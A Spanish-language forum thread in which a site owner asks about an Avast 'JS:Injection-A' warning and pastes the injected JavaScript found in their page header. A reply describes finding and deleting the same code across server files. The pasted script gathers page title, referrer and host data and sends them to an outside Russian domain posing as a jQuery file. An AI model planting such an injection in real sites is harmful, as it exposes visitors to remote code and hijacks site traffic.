Avast da error de JS: Inyección-A en mi sitio web

Hoy recibí una advertencia de Avast cuando quería ingresar a mi sitio web: forumhan.com.

Para entender esto debes tener Avast en tu computadora.

Mi sitio web estaba infectado con JS: Inyección-A [Trj], es por eso que no se mostraba.

Y cuando miro, encontré esto en mi encabezado:

var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('' + '');} 

Como no soy profesional, no puedo entender si hay alguna relación con otros archivos.

¿Hay alguna llamada a otros archivos en este código?

¿Eliminar esto resuelve el problema o no?

Lo eliminé, pero no puedo ver mi página web.

Encontré la solución.

El problema es lo que estás diciendo. Alguien inyectó ese código en su sitio web (y el mío también). Entonces, lo que hice fue elegir este fragmento:

 encodeURIComponent(document.title) 

y busque en la carpeta htdocs en todos los archivos con Notepad ++ en el servidor.

Entonces he encontrado algo como esto:

  

aquí:

enter image description here

Y lo he borrado de todos los archivos. ¡Y eso es todo!

¡Espero que funcione para usted también! 🙂